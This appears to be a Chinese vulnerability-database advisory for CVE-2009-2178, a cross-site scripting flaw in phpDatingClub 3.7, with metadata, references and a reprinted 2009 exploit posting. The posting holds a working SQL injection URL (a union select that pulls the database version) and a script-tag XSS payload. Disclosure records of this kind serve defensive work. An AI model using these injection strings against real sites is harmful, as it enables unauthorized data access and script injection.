W2B Phpdatingclub "website.php" 跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117998 漏洞类型 跨站脚本
发布时间 2009-06-22 更新时间 2009-06-24
CVE编号 CVE-2009-2178 CNNVD-ID CNNVD-200906-377
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/8990
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-377
|漏洞详情
phpDatingClub3.7版本的website.php中存在跨站脚本攻击漏洞。远程攻击者可以借助页参数,注入任意web脚本或HTML。
|漏洞EXP
###################################################################
###################################################################
phpDatingClub v 3.7(ansubdepartments_id) SQL/XSS Injection Vulnerability    
Note: Algeria 2-0 Zambia
###################################################################
Founder : ThE g0bL!N
Home:WwW.Snakespc.CoM
More info:http://www.w2b.ru/webapp.php?cat=phpDatingClub
###################################################################
###################################################################
SQL Injection Vulnerability  
###################################################################
Exploit
###################################################################
Http://www.site.com/phpDatingClub/search.php?mode=day&sform%5Bday%5D=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44--
Xss
website.php?page=%3Cscript%3Ealert(0)%3C/script%3E
Demo
----
http://www.w2b.ru/demo/phpDatingClub/
######################################################################
Greeting : Super_Ctistal (My Master)  And all Muslims&algerian Hackers

# milw0rm.com [2009-06-22]
|参考资料

来源:MILW0RM
名称:8990
链接:http://www.milw0rm.com/exploits/8990
来源:OSVDB
名称:55316
链接:http://osvdb.org/55316